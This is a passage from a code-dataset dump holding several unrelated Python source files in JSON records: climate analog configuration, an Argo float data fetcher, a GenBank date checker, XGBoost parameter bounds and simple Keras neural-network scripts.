= base64.b64decode(s)\n y = cipherX.decrypt(bytedt)\n return str(y, 'UTF-8').strip('\\0')\n\nif __name__ == '__main__':\n\n obj = Crypt()\n a = obj.encypt(\"test\")\n print(a)\n\n\n\n","sub_path":"Common/Function/DES_en.py","file_name":"DES_en.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"80322279","text":"import os\n\nfrom flyingpigeon import config\nfrom flyingpigeon import templating\nfrom flyingpigeon.utils import prepare_static_folder\n\nimport logging\nLOGGER = logging.getLogger(\"PYWPS\")\n\n\ndef get_configfile(files,\n seasoncyc_base=None,\n seasoncyc_sim=None,\n base_id='NCEP',\n sim_id='NCEP',\n timewin=1,\n varname='slp',\n seacyc=False,\n cycsmooth=91,\n nanalog=20,\n seasonwin=30,\n distfun='rms',\n outformat='.txt',\n period=[\"1973-01-01\", \"2012-12-31\"],\n bbox=\"-180.0,-90.0,180,90.0\",\n calccor=True,\n silent=False):\n \"\"\"\n Generates the configuration file for the CASTf90 calculation.\n\n TODO: use jjinja template\n\n :param files: input files (reference period and period for analyses)\n :param timewin: number of days the distance is averaged\n :param varname: variable name in input files\n :param seacyc: remove the smoothed seasonal cycle from the input fields (True/False)\n :param cycsmooth: smoothing window for the seasonal cycle in days (should be an odd integer)\n :param nanalog: Number of analogs to detect\n :param distfun: Name of the distance function used to calculate the analogs.\n (Supported values: 'rms' 'mahalanobis', 'S1' (Teweles and wobus), 'cosine' (correlation)\n and - still experimental - 'of' (displacement and amplitude score based on optical flow image distortion)\n :param outformat: file format for output ('txt' or 'nc' (default))\n :param analysis_period: dates for which analogs are desired\n :param period: reference period in which analogs are picked (for netcdf output attributes)\n :param bbox: coordinates for the region to be analysed\n :param calccor: calculate rank correlation for analog fields (True/False)\n :param silent: handling of log file output\n\n :returns: configuration file\n \"\"\"\n from datetime import datetime as dt\n\n date_stamp = dt.strftime(dt.now(), format='%Y%m%d_%H%M%S')\n LOGGER.info('start configuration file preparation at: %s' % (date_stamp))\n\n # convert True/False to Fortran syntax\n seacyc = str(seacyc)\n calccor = str(calccor)\n silent = str(silent)\n\n # write stuff to configuration file\n # NB: if order or format or number changes, need to edit wps_analogs_viewer.py\n # and template_analogviewer.html where these scripts read in the config\n # params\n config_file = \"config.txt\"\n\n config = open(config_file, \"w\")\n\n config.write(\n '!Configuration file for CASTf90 analogs processes deployed in flyingpigeon\\n')\n config.write('!Created : %s \\n' % (date_stamp))\n config.write('!Version : 0.1.5 \\n')\n config.write('&FILES \\n')\n config.write(' my_files%archivefile = \"{file}\" \\n'.format(\n file=os.path.relpath(files[0])))\n config.write(' my_files%simulationfile = \"{file}\" \\n'.format(\n file=os.path.relpath(files[1])))\n config.write(' my_files%outputfile = \"{file}\" \\n'.format(\n file=os.path.relpath(files[2])))\n\n if seacyc is not 'False':\n config.write(' my_files%seacycfilebase = \"{file}\" \\n'.format(\n file=os.path.relpath(seasoncyc_base)))\n config.write(' my_files%seacycfilesim = \"{file}\" \\n'.format(\n file=os.path.relpath(seasoncyc_sim)))\n\n config.write('/ \\n')\n config.write('&PARAM \\n')\n config.write(' my_params%timewin = {timewin} \\n'.format(timewin=timewin))\n config.write(' my_params%varname = \"{varname}\" \\n'.format(varname=varname))\n config.write(' my_params%seacyc = .{seacyc}. \\n'.format(\n seacyc=seacyc.upper()))\n config.write(' my_params%cycsmooth = {cycsmooth} \\n'.format(\n cycsmooth=cycsmooth))\n config.write(' my_params%nanalog = {nanalog} \\n'.format(nanalog=nanalog))\n config.write(' my_params%seasonwin = {seasonwin} \\n'.format(\n seasonwin=seasonwin))\n config.write(' my_params%distfun = \"{distfun}\" \\n'.format(distfun=distfun))\n config.write(' my_params%calccor = .{calccor}. \\n'.format(\n calccor=calccor.upper()))\n config.write(' my_params%oformat = \"{outformat}\" \\n'.format(\n outformat=outformat)) # \".txt\" # ! if equals \".nc\"\n config.write(' my_params%silent = .{silent}.\\n'.format(\n silent=silent.upper()))\n config.write('/\\n')\n config.write('&ATTS\\n')\n config.write(' my_atts%simsource = \"{sim_id}\" \\n'.format(sim_id=sim_id)) # model name\n config.write(\n ' my_atts%predictorvar = \"{varname}\" \\n'.format(varname=varname))\n config.write(' my_atts%archisource = \"{base_id}\" \\n'.format(base_id=base_id))\n config.write(' my_atts%archiperiod = \"{start},{end}\" \\n'.format(\n start=period[0], end=period[1]))\n config.write(' my_atts%predictordom = \"{bbox}\" \\n'.format(bbox=bbox))\n config.write('/\\n')\n\n config.close()\n return config_file\n\n# def subset(resource=[], bbox='-80,50,22.5,70'):\n# \"\"\"\n# OBSOLETE\n# Returns a subset.\n\n# :param resource: netCDF input files of one dataset\n# :param bbox: bounding box\n\n# :return: subset netCDF file\n# \"\"\"\n# from tempfile import mkstemp\n# from cdo import Cdo\n# cdo = Cdo()\n# resource.sort()\n\n# ip, nc_concat = mkstemp(dir='.',suffix='.nc')\n# nc_concat = cdo.cat(input=resource, output=nc_concat)\n\n# ip, nc_subset = mkstemp(dir='.',suffix='.nc')\n# nc_subset = cdo.sellonlatbox('%s' % bbox, input=nc_concat, output=nc_subset)\n# LOGGER.info('subset done: %s ' % nc_subset)\n\n# return nc_subset\n\n\ndef seacyc(archive, simulation, method='base'):\n \"\"\"\n Subtracts the seasonal cycle.\n\n :param archive: netCDF file containing the reference period\n :param simulation: netCDF file containing the period to be analysed\n :param method: method to generate the seasonal cycle files\n base = seasonal cycle generated from reference period\n sim = seasonal cycle generated from period to be analysed\n own = seasonal cycle generated for both time windows\n\n :return [str,str]: two netCDF filenames for analysis and reference period (located in working directory)\n \"\"\"\n try:\n LOGGER.debug('seacyc started with method: %s' % method)\n\n from shutil import copy\n from flyingpigeon.ocgis_module import call\n from flyingpigeon.utils import get_variable\n from cdo import Cdo\n cdo = Cdo()\n\n if method == 'base':\n seasoncyc_base = cdo.ydaymean(\n input=archive, output='seasoncyc_base.nc')\n variable = get_variable(archive)\n # seasoncyc_base = call(resource=archive,\n # variable=variable,\n # prefix='seasoncyc_base',\n # calc=[{'func': 'mean', 'name': variable}],\n # calc_grouping=['day','month'] )\n\n LOGGER.debug('seasoncyc_base calculated : %s' % seasoncyc_base)\n cdo.ydaymean(input=archive, output='seasoncyc_base.nc')\n seasoncyc_sim = 'seasoncyc_sim.nc'\n copy(seasoncyc_base, seasoncyc_sim)\n elif method == 'sim':\n # seasoncyc_sim = call(resource=archive,\n # variable=variable,\n # prefix='seasoncyc_sim',\n # calc=[{'func': 'mean', 'name': variable}],\n # calc_grouping=['day','month'] )\n cdo.ydaymean(input=simulation, output='seasoncyc_sim.nc')\n seasoncyc_base = 'seasoncyc_base.nc'\n copy(seasoncyc_sim, seasoncyc_base)\n elif method == 'own':\n # seasoncyc_base = call(resource=archive,\n # variable=variable,\n # prefix='seasoncyc_base',\n # calc=[{'func': 'mean', 'name': variable}],\n # calc_grouping=['day','month'] )\n seasoncyc_base = cdo.ydaymean(\n input=archive, output='seasoncyc_base.nc')\n # seasoncyc_sim = call(resource=archive,\n # variable=variable,\n # prefix='seasoncyc_sim',\n # calc=[{'func': 'mean', 'name': variable}],\n # calc_grouping=['day','month'] )\n seasoncyc_sim = cdo.ydaymean(\n input=simulation, output='seasoncyc_sim.nc')\n else:\n raise Exception('normalisation method not found')\n\n except Exception:\n msg = 'seacyc function failed:'\n LOGGER.exception(msg)\n raise Exception(msg)\n\n return seasoncyc_base, seasoncyc_sim\n\n\ndef config_edits(configfile):\n \"\"\"\n Edits the CASTf90 configuration file. Removes filepaths.\n\n :param configfile: configfile name with its path\n\n :return str: modified_configfile name\n \"\"\"\n try:\n\n # Read in the file\n filedata = None\n with open(configfile, 'r') as file:\n filedata = file.read()\n\n # Replace the target string\n filedata = filedata.replace(\n '/home/scratch01/sradanov/A2C2/NCEP/', '').replace('/home/estimr2/sradanov/Operational/', '')\n\n # Write the file out again\n with open(configfile, 'w') as file:\n file.write(filedata)\n\n LOGGER.info('configfile modified')\n except Exception:\n LOGGER.exeption('Failed to modify configfile:')\n\n return configfile\n\n\ndef reformat_analogs(analogs):\n \"\"\"\n Reformats analogs results file for analogues viewer code.\n\n :param analogs: output from analog_detection process\n\n :return str: reformatted analogs file for analogues viewer\n \"\"\"\n import numpy as np\n import pandas as pd\n\n try:\n num_cols = 3 # dateAnlg, Dis, Corr\n\n # Create dataframe and read in output csv file of analogs process\n dfS = pd.DataFrame()\n dfS = pd.read_csv(analogs, delimiter=r\"\\s+\", index_col=0)\n\n # Find number of analogues\n num_analogues = (dfS.shape[1]) / 3\n # LOGGER.debug('num_analogues: %s', num_analogues)\n\n # Define temporary df\n df_anlg = dfS.iloc[:, 0:num_analogues] # store only anlg dates\n df_dis = dfS.iloc[:, num_analogues:2 * num_analogues] # store only dis\n df_corr = dfS.iloc[:, 2 * num_analogues:3 *\n num_analogues] # store only corr\n\n # remove index name before stacking\n df_anlg.index.name = \"\"\n df_dis.index.name = \"\"\n df_corr.index.name = \"\"\n\n dateStack = df_anlg.stack()\n disStack = df_dis.stack().abs() # raw values < 0 so take abs\n corrStack = df_corr.stack()\n\n # Create df of correct dimensions (n x num_cols) using dfS\n df_all = dfS.iloc[:, 0:num_cols] # NB data are placeholders\n # Rename cols\n df_all.columns = ['dateAnlg', 'Dis', 'Corr']\n # Replicate each row 20 times (for dcjs format)\n df_all = df_all.loc[np.repeat(df_all.index.values, num_analogues)]\n # Replace data placeholders with correct values\n df_all['dateAnlg'] = list(dateStack)\n df_all['Dis'] = list(disStack)\n df_all['Corr'] = list(corrStack)\n # Name index col\n df_all.index.name = 'dateRef'\n\n # save to tsv file\n analogs_mod = 'modified-analogfile.tsv'\n df_all.to_csv(analogs_mod, sep='\\t')\n LOGGER.info('successfully reformatted analog file')\n except Exception:\n msg = 'failed to reformat analog file'\n LOGGER.exception(msg)\n raise Exception(msg)\n return analogs_mod\n\n\ndef render_viewer(configfile, datafile):\n \"\"\"\n Generate an analogs viewer HTML page based on a template.\n\n :param datafile: modified analogs file (output of reformat_analogs)\n :param configfile: configuration file\n\n return html: analog viewer html page\n \"\"\"\n try:\n page = 'analogviewer.html'\n with open(page, 'w') as fp:\n fp.write(templating.render_template(\n page,\n configfile=configfile,\n datafile=datafile,\n # static_url=config.output_url() + '/static'))\n static_url='../static'))\n prepare_static_folder()\n except Exception:\n msg = \"Failed to render analogviewer.\"\n LOGGER.exception(msg)\n raise Exception(msg)\n else:\n return page\n","sub_path":"flyingpigeon/analogs.py","file_name":"analogs.py","file_ext":"py","file_size_in_byte":12239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129188159","text":"#!/bin/env python\n# -*coding: UTF-8 -*-\n#\n# Argo data fetcher for Argovis.\n# Code borrows heavily from API gathered at:\n# https://github.com/earthcube2020/ec20_tucker_etal/blob/master/EC2020_argovis_python_api.ipynb\n#\n# This is comprised of functions used to query Argovis api\n# query functions either return dictionary objects or error messages.\n#\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport json\nimport getpass\nfrom .proto import ArgoDataFetcherProto\nfrom abc import abstractmethod\nimport warnings\n\nfrom argopy.stores import httpstore\nfrom argopy.options import OPTIONS\nfrom argopy.utilities import list_standard_variables\nfrom argopy.errors import DataNotFound\nfrom argopy.plotters import open_dashboard\n\naccess_points = ['wmo', 'box']\nexit_formats = ['xarray']\ndataset_ids = ['phy'] # First is default\napi_server = 'https://argovis.colorado.edu' # API root url\napi_server_check = api_server + '/catalog' # URL to check if the API is alive\n\nclass ArgovisDataFetcher(ArgoDataFetcherProto):\n ###\n # Methods to be customised for a specific Argovis request\n ###\n @abstractmethod\n def init(self):\n \"\"\" Initialisation for a specific fetcher \"\"\"\n pass\n\n @abstractmethod\n def cname(self):\n \"\"\" Return a unique string defining the request\n\n Provide this string to populate meta data and titles\n \"\"\"\n pass\n\n @property\n def url(self):\n \"\"\" Return the URL used to download data \"\"\"\n pass\n\n ###\n # Methods that must not change\n ###\n def __init__(self,\n ds: str = \"\",\n cache: bool = False,\n cachedir: str = \"\",\n **kwargs):\n \"\"\" Instantiate an Argovis Argo data loader\n\n Parameters\n ----------\n ds: 'phy'\n cache : False\n cachedir : None\n \"\"\"\n self.fs = httpstore(cache=cache, cachedir=cachedir, timeout=120)\n self.definition = 'Argovis Argo data fetcher'\n self.dataset_id = OPTIONS['dataset'] if ds == '' else ds\n self.server = api_server\n self.init(**kwargs)\n self.key_map = {\n 'date': 'TIME',\n 'date_qc': 'TIME_QC',\n 'lat': 'LATITUDE',\n 'lon': 'LONGITUDE',\n 'cycle_number': 'CYCLE_NUMBER',\n 'DATA_MODE': 'DATA_MODE',\n 'DIRECTION': 'DIRECTION',\n 'platform_number': 'PLATFORM_NUMBER',\n 'position_qc': 'POSITION_QC',\n 'pres': 'PRES',\n 'temp': 'TEMP',\n 'psal': 'PSAL',\n 'index': 'N_POINTS'\n }\n\n def __repr__(self):\n summary = [\"\" % self.definition]\n summary.append(\"Domain: %s\" % self.cname())\n return '\\n'.join(summary)\n\n def _add_history(self, this, txt):\n if 'history' in this.attrs:\n this.attrs['history'] += \"; %s\" % txt\n else:\n this.attrs['history'] = txt\n return this\n\n def json2dataframe(self, profiles):\n \"\"\" convert json data to Pandas DataFrame \"\"\"\n # Make sure we deal with a list\n if isinstance(profiles, list):\n data = profiles\n else:\n data = [profiles]\n # Transform\n rows = []\n for profile in data:\n keys = [x for x in profile.keys() if x not in ['measurements', 'bgcMeas']]\n meta_row = dict((key, profile[key]) for key in keys)\n for row in profile['measurements']:\n row.update(meta_row)\n rows.append(row)\n df = pd.DataFrame(rows)\n return df\n\n def to_dataframe(self):\n \"\"\" \"\"\"\n results = []\n urls = self.url\n if isinstance(urls, str):\n urls = [urls] # Make sure we deal with a list\n for url in urls:\n js = self.fs.open_json(url)\n if isinstance(js, str):\n continue\n df = self.json2dataframe(js)\n df = df.reset_index()\n df = df.rename(columns=self.key_map)\n df = df[[value for value in self.key_map.values() if value in df.columns]]\n results.append(df)\n\n results = [r for r in results if r is not None] # Only keep non-empty results\n if len(results) > 0:\n df = pd.concat(results, ignore_index=True)\n df.sort_values(by=['TIME', 'PRES'], inplace=True)\n df = df.set_index(['N_POINTS'])\n # df['N_POINTS'] = np.arange(0, len(df['N_POINTS'])) # Re-index to avoid duplicate values\n return df\n else:\n raise DataNotFound(\"CAN'T FETCH ANY DATA !\")\n\n def to_xarray(self):\n \"\"\" Download and return data as xarray Datasets \"\"\"\n ds = self.to_dataframe().to_xarray()\n ds = ds.sortby(['TIME', 'PRES']) # should already be sorted by date in decending order\n ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS'])) # Re-index to avoid duplicate values\n\n # Set coordinates:\n # ds = ds.set_coords('N_POINTS')\n coords = ('LATITUDE', 'LONGITUDE', 'TIME', 'N_POINTS')\n ds = ds.reset_coords()\n ds['N_POINTS'] = ds['N_POINTS']\n # Convert all coordinate variable names to upper case\n for v in ds.data_vars:\n ds = ds.rename({v: v.upper()})\n ds = ds.set_coords(coords)\n\n # Cast data types and add variable attributes (not available in the csv download):\n ds = ds.argo.cast_types()\n\n # Remove argovis file attributes and replace them with argopy ones:\n ds.attrs = {}\n if self.dataset_id == 'phy':\n ds.attrs['DATA_ID'] = 'ARGO'\n elif self.dataset_id == 'ref':\n ds.attrs['DATA_ID'] = 'ARGO_Reference'\n elif self.dataset_id == 'bgc':\n ds.attrs['DATA_ID'] = 'ARGO-BGC'\n ds.attrs['DOI'] = 'http://doi.org/10.17882/42182'\n ds.attrs['Fetched_from'] = self.server\n ds.attrs['Fetched_by'] = getpass.getuser()\n ds.attrs['Fetched_date'] = pd.to_datetime('now').strftime('%Y/%m/%d')\n ds.attrs['Fetched_constraints'] = self.cname()\n ds.attrs['Fetched_uri'] = self.url\n ds = ds[np.sort(ds.data_vars)]\n return ds\n\n def filter_data_mode(self, ds, **kwargs):\n # Argovis data already curated !\n # ds = ds.argo.filter_data_mode(errors='ignore', **kwargs)\n if ds.argo._type == 'point':\n ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))\n return ds\n\n def filter_qc(self, ds, **kwargs):\n # Argovis data already curated !\n # ds = ds.argo.filter_qc(**kwargs)\n if ds.argo._type == 'point':\n ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))\n return ds\n\n def filter_variables(self, ds, mode='standard'):\n if mode == 'standard':\n to_remove = sorted(list(set(list(ds.data_vars)) - set(list_standard_variables())))\n return ds.drop_vars(to_remove)\n else:\n return ds\n\n\nclass Fetch_wmo(ArgovisDataFetcher):\n def init(self, WMO=[], CYC=None):\n \"\"\" Create Argo data loader for WMOs and CYCs\n\n Parameters\n ----------\n WMO : list(int)\n The list of WMOs to load all Argo data for.\n CYC : int, np.array(int), list(int)\n The cycle numbers to load.\n \"\"\"\n if isinstance(WMO, int):\n WMO = [WMO] # Make sure we deal with a list\n if isinstance(CYC, int):\n CYC = np.array((CYC,), dtype='int') # Make sure we deal with an array of integers\n if isinstance(CYC, list):\n CYC = np.array(CYC, dtype='int') # Make sure we deal with an array of integers\n self.WMO = WMO\n self.CYC = CYC\n\n self.definition = \"?\"\n if self.dataset_id == 'phy':\n self.definition = 'Argovis Argo data fetcher for floats'\n return self\n\n def cname(self):\n \"\"\" Return a unique string defining the constraints \"\"\"\n if len(self.WMO) > 1:\n listname = [\"WMO%i\" % i for i in self.WMO]\n if isinstance(self.CYC, (np.ndarray)):\n [listname.append(\"CYC%0.4d\" % i) for i in self.CYC]\n listname = \";\".join(listname)\n else:\n listname = \"WMO%i\" % self.WMO[0]\n if isinstance(self.CYC, (np.ndarray)):\n listname = [listname]\n [listname.append(\"CYC%0.4d\" % i) for i in self.CYC]\n listname = \"_\".join(listname)\n listname = self.dataset_id + \"_\" + listname\n return listname\n\n @property\n def url(self):\n \"\"\" Return the URL used to download data \"\"\"\n urls = []\n if isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:\n profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]\n urls.append((self.server + '/catalog/mprofiles/?ids={}').format(profIds).replace(' ', ''))\n # elif self.dataset_id == 'bgc' and isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:\n # profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]\n # urls.append((self.server + '/catalog/profiles/{}').format(self.CYC))\n else:\n for wmo in self.WMO:\n urls.append((self.server + '/catalog/platforms/{}').format(str(wmo)))\n if len(urls) == 1:\n return urls[0]\n else:\n return urls\n\n def dashboard(self, **kw):\n if len(self.WMO) == 1:\n return open_dashboard(wmo=self.WMO[0], **kw)\n else:\n warnings.warn(\"Plot dashboard only available for one float frequest\")\n\n\nclass Fetch_box(ArgovisDataFetcher):\n\n def init(self, box: list):\n \"\"\" Create Argo data loader\n\n Parameters\n ----------\n box : list(float, float, float, float, float, float, str, str)\n The box domain to load all Argo data for:\n box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max, datim_min, datim_max]\n \"\"\"\n if len(box) == 6:\n # Select the last months of data:\n end = pd.to_datetime('now')\n start = end - pd.DateOffset(months=1)\n box.append(start.strftime('%Y-%m-%d'))\n box.append(end.strftime('%Y-%m-%d'))\n elif len(box) != 8:\n raise ValueError('Box must 6 or 8 length')\n self.BOX = box\n\n self.definition = '?'\n if self.dataset_id == 'phy':\n self.definition = 'Argovis Argo data fetcher for a space/time region'\n return self\n\n def cname(self):\n \"\"\" Return a unique string defining the constraints \"\"\"\n BOX = self.BOX\n boxname = (\"[x=%0.2f/%0.2f; y=%0.2f/%0.2f; z=%0.1f/%0.1f; t=%s/%s]\") % \\\n (BOX[0], BOX[1], BOX[2], BOX[3], BOX[4], BOX[5],\n self._format(BOX[6], 'tim'), self._format(BOX[7], 'tim'))\n boxname = self.dataset_id + \"_\" + boxname\n return boxname\n\n @property\n def url(self):\n \"\"\" Return the URL used to download data \"\"\"\n shape = [[[self.BOX[0], self.BOX[2]], [self.BOX[0], self.BOX[3]], [self.BOX[1], self.BOX[3]],\n [self.BOX[1], self.BOX[2]], [self.BOX[0], self.BOX[2]]]]\n strShape = str(shape).replace(' ', '')\n url = self.server + '/selection/profiles'\n url += '?startDate={}'.format(self.BOX[6])\n url += '&endDate={}'.format(self.BOX[7])\n url += '&shape={}'.format(strShape)\n url += '&presRange=[{},{}]'.format(self.BOX[4], self.BOX[5])\n return url\n","sub_path":"argopy/data_fetchers/argovis_data.py","file_name":"argovis_data.py","file_ext":"py","file_size_in_byte":11634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"191720903","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nfind_invalid_dates.py\n\n@author: Bill Thompson\n@license: GPL 3\n@copyright: Sept. 14, 2020\n\"\"\"\n\nfrom datetime import datetime\nfrom consensus3 import read_genbank_file\nfrom remove_dups_dates import read_fasta_file\n\ndef check_date(date):\n \"\"\"\n check_date - check for complete date, month, day, year\n\n Parameters\n ----------\n date : str\n a GenBank collection date.\n\n Returns\n -------\n dt : tuple\n (datetime object, boolean) \n second term is TRUE if date is complte\n \"\"\"\n # try and guess the format\n date_ok = True\n try:\n dt = datetime.strptime(date, '%d-%b-%Y')\n except ValueError:\n try:\n dt = datetime.strptime(date, '%b-%Y')\n date_ok = False\n except ValueError:\n try:\n dt = datetime.strptime(date, '%m/%d/%Y')\n except ValueError:\n try:\n dt = datetime.strptime(date, '%Y-%m-%d')\n except:\n try:\n dt = datetime.strptime(date, '%Y-%m')\n date_ok = False\n except:\n dt = datetime.strptime(date, '%Y')\n date_ok = False\n\n return (dt, date_ok)\n\ndef main():\n date = '2020_09_04'\n base = '/mnt/g/Covid-19/' + date + '/' \n \n fasta_file = base + 'sequences.fasta'\n genbank_file = base + 'sequences.gb'\n \n all_seqs = read_fasta_file(fasta_file)\n gb = read_genbank_file(genbank_file)\n \n for id, record in gb.items():\n collection_date = record.features[0].qualifiers['collection_date'][0]\n formatted_date, ok = check_date(collection_date)\n if (not ok) and id in all_seqs :\n print(id, collection_date, formatted_date)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"find_invalid_dates.py","file_name":"find_invalid_dates.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"174253706","text":"LOWER_BOUND = .000001\nINFINITY = 99999\n\n# http://xgboost.readthedocs.io/en/latest/parameter.html\nCONSTRAINT = {\n 'max_depth': [0, INFINITY],\n 'min_child_weight': [0, INFINITY],\n 'eta': [0.0, 1.0],\n 'subsample': [LOWER_BOUND, 1],\n 'colsample_bytree': [LOWER_BOUND, 1],\n 'objective':'reg:linear'\n}\n\nSTEP = {\n 'max_depth': 1,\n 'min_child_weight': 1,\n 'eta': 0.02,\n 'subsample': 0.02,\n 'colsample_bytree': 0.04,\n 'objective':'reg:linear'\n}\n","sub_path":"src/global_constraint.py","file_name":"global_constraint.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"122147729","text":"from numpy.lib.function_base import average\nfrom tensorflow.keras.layers.experimental import preprocessing\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow import keras\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\n\nclass GeneralANN:\n raw_data = pd.DataFrame()\n train_inp = pd.DataFrame()\n train_out = pd.DataFrame()\n test_inp = pd.DataFrame()\n test_out = pd.DataFrame()\n fraction = 0.0\n layers = []\n activation_functions = []\n normalizer = 0\n model_history = 0\n model = 0\n\n def define_layers(self, layers, functions):\n for layer, function in zip(layers, functions):\n self.layers.append(layer)\n self.activation_functions.append(function)\n\n def prepare_data(self, raw_data, inp, out, fraction=0.8):\n self.fraction = fraction\n dataset = raw_data.copy()\n self.raw_data = dataset\n train = dataset.sample(frac=fraction, random_state=0)\n self.train_inp = train[inp]\n self.train_out = train[out]\n test = dataset.drop(train.index)\n self.test_inp = test[inp]\n self.test_out = test[out]\n \n\n def normalize_data(self, show_example = False):\n\n self.normalizer = preprocessing.Normalization()\n self.normalizer.adapt(np.array(self.train_inp))\n first = np.array(self.train_inp[:1])\n\n if show_example:\n with np.printoptions(precision=2, suppress=True):\n print('First example:', first)\n print('Normalized:', self.normalizer(first).numpy())\n \n def build_and_compile_model(self, ann_layers, functions, eta=0.0001):\n if len(ann_layers)-1 != len(functions): \n print(\"wrong number of layers or activation functions!\")\n print(ann_layers)\n print(functions)\n arguments = [self.normalizer]\n for layer, function in zip(ann_layers[:-1], functions):\n arguments.append(layers.Dense(layer, activation=function))\n arguments.append(layers.Dense(ann_layers[-1]))\n \n self.model = keras.Sequential(arguments)\n self.model.compile(loss='mean_absolute_error',\n optimizer=tf.keras.optimizers.Adam(eta))\n\n def plot_loss(self):\n plt.plot(self.model_history.history['loss'], label='loss')\n y2 = max(self.model_history.history['val_loss'])\n y1 = min(self.model_history.history['val_loss'])\n plt.plot(self.model_history.history['val_loss'], label='val_loss')\n plt.ylim([0.8*y1, 1.1*y2])\n plt.xlabel('Epoch')\n plt.ylabel('Mean Absolute Error')\n plt.legend()\n plt.grid(True)\n plt.show()\n\n def print_weights(self):\n i = 0\n for layer in self.model.layers[1:]:\n i+=1\n for each in layer.get_weights()[0][:]:\n print(\"layer \",i, each)\n\n def plot_scheme(self):\n plot_model(self.model, to_file='model.png', show_shapes=True, show_dtype=False,\n show_layer_names=False, rankdir='TB', expand_nested=True, dpi=96)\n \n def train(self, batch = 10, epochs = 100):\n self.model_history = self.model.fit(self.train_inp, self.train_out, \n validation_split=0.2, batch_size=batch,\n verbose=2, epochs=epochs)\n\n def test(self, test_inp=0, test_out=0):\n print(\"**********************************************************************\")\n if test_inp==0:\n test_inp = self.test_inp\n test_out = self.test_out\n print(\"test on the %.2f %% of data, unused for training\" %((1-self.fraction)*100))\n test_results = self.model.evaluate(test_inp, test_out, verbose=1)\n print(\"test result: \", test_results)\n print(\"**********************************************************************\")\n\n\nif __name__ == '__main__':\n\n raw_dataset = pd.read_csv(\"data_RM.csv\",\n na_values=' ', comment='\\t',\n sep=',', skipinitialspace=True)\n\n inp = ['PAR', 'PK1', 'PK2', 'PK3', 'PK4', 'PK5', 'PK6']\n out = ['rho'] \n\n GANN = GeneralANN()\n GANN.prepare_data(raw_dataset, inp=inp, out=out, fraction=0.9)\n GANN.normalize_data(show_example = False)\n GANN.build_and_compile_model([100,50, 20, 1],['relu', 'relu', 'relu'], eta=0.0001)\n GANN.train(batch=100, epochs=1000)\n GANN.test()\n GANN.plot_loss()\n GANN.plot_scheme()\n\n\n","sub_path":"ANN-general.py","file_name":"ANN-general.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"61669813","text":"from ann import NeuralNetwork\nimport pandas as pd\nimport numpy as np\n\n\n# data preprocessing\ndf = pd.read_csv('dataset_NN.csv').sample(frac=1).to_numpy()\nfor i in [3, 5]: # normalize necessary data\n max, min = np.amax(df[:, i]), np.amin(df[:, i])\n df[:, i] = (df[:, i]-min)/(max-min)\n# convert classes from [1, ..., n] to [0, ...., n-1]\ndf[:, -1] = df[:, -1] - 1\n# split data to 70:30 ratio.\ntraindata, testdata = df[:int(0.7*df.shape[0])], df[int(0.7*df.shape[0]):]\n# split train and test data to features and target\ntrain_x, train_y = traindata[:, :-1], traindata[:, -1]\ntest_x, test_y = testdata[:, :-1], testdata[:, -1]\n\n\n# ANN with 1 hidden layer\n\nnn1 = NeuralNetwork(6)\nnn1.addLayer(8, 'tanh')\nnn1.addLayer(10, 'sigmoid')\nnn1.fit(train_x, np.atleast_2d(train_y).T,\n batch_size=5, max_epochs=700, lr=0.01)\nmpred = nn1.predict(test_x)\nmext = nn1.extend(test_y)\nmodelError = np.add(np.multiply(mext, np.log(mpred)),\n np.multiply(1-mext, np.log(1-mpred)))\nmodelError = -np.sum(np.sum(modelError, axis=1), axis=0)/test_x.shape[0]\nprint('Final test error', modelError)\n\n\nprint(\"\\n<<<<<<<<<<<<<<<< Accuracy >>>>>>>>>>>>>>>>>>\")\nprint(\"NN1 Test Accuracy \", nn1.accuracy(test_x, test_y))\nprint(\"NN1 Train Accuracy\", nn1.accuracy(train_x, train_y), \"\\n\")\n\n\n# ANN with two hidden layers\nnn2 = NeuralNetwork(6)\nnn2.addLayer(7, 'sigmoid')\nnn2.addLayer(9, 'sigmoid')\nnn2.addLayer(10, 'sigmoid')\nnn2.fit(train_x, np.atleast_2d(train_y).T,\n batch_size=5, max_epochs=700, lr=0.01)\nmpred = nn2.predict(test_x)\nmext = nn2.extend(test_y)\nmodelError = np.add(np.multiply(mext, np.log(mpred)),\n np.multiply(1-mext, np.log(1-mpred)))\nmodelError = -np.sum(np.sum(modelError, axis=1), axis=0)/test_x.shape[0]\nprint('Final test error', modelError)\n\n\nprint(\"\\n<<<<<<<<<<<<<<<< Accuracy >>>>>>>>>>>>>>>>>>\")\nprint(\"NN2 Test Accuracy \", nn2.accuracy(test_x, test_y))\nprint(\"NN2 Train Accuracy\", nn2.accuracy(train_x, train_y), \"\\n\")\n","sub_path":"Annexample.py","file_name":"Annexample.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"354771931","text":"from tkinter import StringVar, DoubleVar, IntVar, BooleanVar\n\n\ndef get_value_variable(values):\n\t\"\"\"\n\tGets the type of variable needed for 